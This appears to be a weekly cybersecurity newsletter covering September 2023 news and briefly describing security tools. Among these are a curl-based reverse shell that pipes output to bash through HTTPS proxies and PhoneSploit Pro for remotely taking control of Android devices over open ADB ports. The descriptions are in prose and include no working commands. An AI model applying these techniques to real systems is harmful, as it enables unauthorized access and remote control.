Week 38, September 18-24, 2023

Week 38, September 18-24, 2023. Cybersecurity Weekly Updates.

This week in the world of cybersecurity:

New AMBERSQUID Attacks on AWS Services
This week, a new cryptojacking operation called AMBERSQUID started going after uncommon AWS services. The main point is that even less-known services on AWS can be targets, so you need to keep all parts of your cloud secure.

MFA and PAM Solutions Might Not Be Enough
If you think MFA (Multi-Factor Authentication) and PAM (Privileged Access Management) solutions keep you completely safe, it’s time to think again. Some people found ways to get around these security steps, so always keep an eye out for updates and new ways to protect yourself.

Financial Focus in Ransomware Attacks by UNC3944
A group known as UNC3944 has switched its focus to ransomware attacks with a financial motive. This suggests that ransomware continues to be a profitable route for cybercriminals and companies should stay alert.

Microsoft’s Big Data Leak
A big mistake happened at Microsoft, where 38 terabytes of confidential data got exposed by their own AI researchers. It’s a good reminder that even big companies can mess up and leak data, so being careful is key.

Apple’s Urgent Security Patch for Zero-Day Flaws
Apple had to quickly fix three new zero-day flaws this week, affecting iOS, macOS, and Safari. This means that even well-known and trusted brands like Apple can have serious issues that need fast action.

Recent Tools and Techniques

These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.

The CURL shell tool is designed to help security researchers establish a reverse shell in environments where only HTTPS proxy connections are allowed. Using this HTTP server, you can multiplex standard input/output and error channels of a remote reverse shell through an HTTPS proxy. To use it, start the listener with a specified certificate, private key, and listening port. On the remote machine, you can initiate the reverse shell by using a curl command that communicates with the listener, piping the output to bash for execution.

InfoHound is an OSINT tool focused on domain profiling, particularly useful during the reconnaissance phase of a security assessment. The tool employs passive analysis techniques to gather a wide range of data given a web domain name. It can collect emails, names, files, subdomains, usernames, and URLs, which are then further analyzed to extract more detailed information. The tool is modular, offering various retrieval and analysis options ranging from Whois lookups and DNS record queries to subdomain take-over checks and email breach assessments. InfoHound can be easily installed using Docker and allows for the addition of custom modules for extended functionality.

NucleiFuzzer is an automation tool designed for web application security testing. It combines the features of ParamSpider and Nuclei to detect a range of vulnerabilities such as XSS, SQLi, SSRF, and Open-Redirect. By using ParamSpider to find possible entry points and Nuclei to carry out vulnerability scanning, the tool streamlines the detection process. This makes it easier for both security professionals and web developers to identify and fix security risks in a more efficient manner.

PhoneSploit Pro is a hacking tool written in Python aimed at remotely exploiting Android devices. It automates the use of ADB (Android Debug Bridge) and Metasploit-Framework to gain unauthorized access to Android devices, given that they have an open ADB port TCP 5555. The tool offers a range of features for both Wi-Fi and USB connections, including remote shell access, screenshot capture, and file transfers between the target device and the computer. It also provides automated payload creation and deployment to obtain a Meterpreter session, which essentially gives full control over the targeted Android device. The tool comes with added functionalities like SMS sending, device unlocking, and local network scanning, among others. It aims to simplify penetration testing on Android devices by automating various tasks.

That’s a wrap on this week’s edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defense. Hopefully, the insights and information shared today will assist in navigating this complex domain and in strengthening defenses against potential threats. Stay vigilant, stay informed, and look forward to more insights into the world of cyber-security in next week’s edition.

To stay in sync with the weekly cyber-security roundups, remember to subscribe to the newsletter and follow on social media platforms. If there are any questions or specific topics you’d like to see covered, don’t hesitate to get in touch.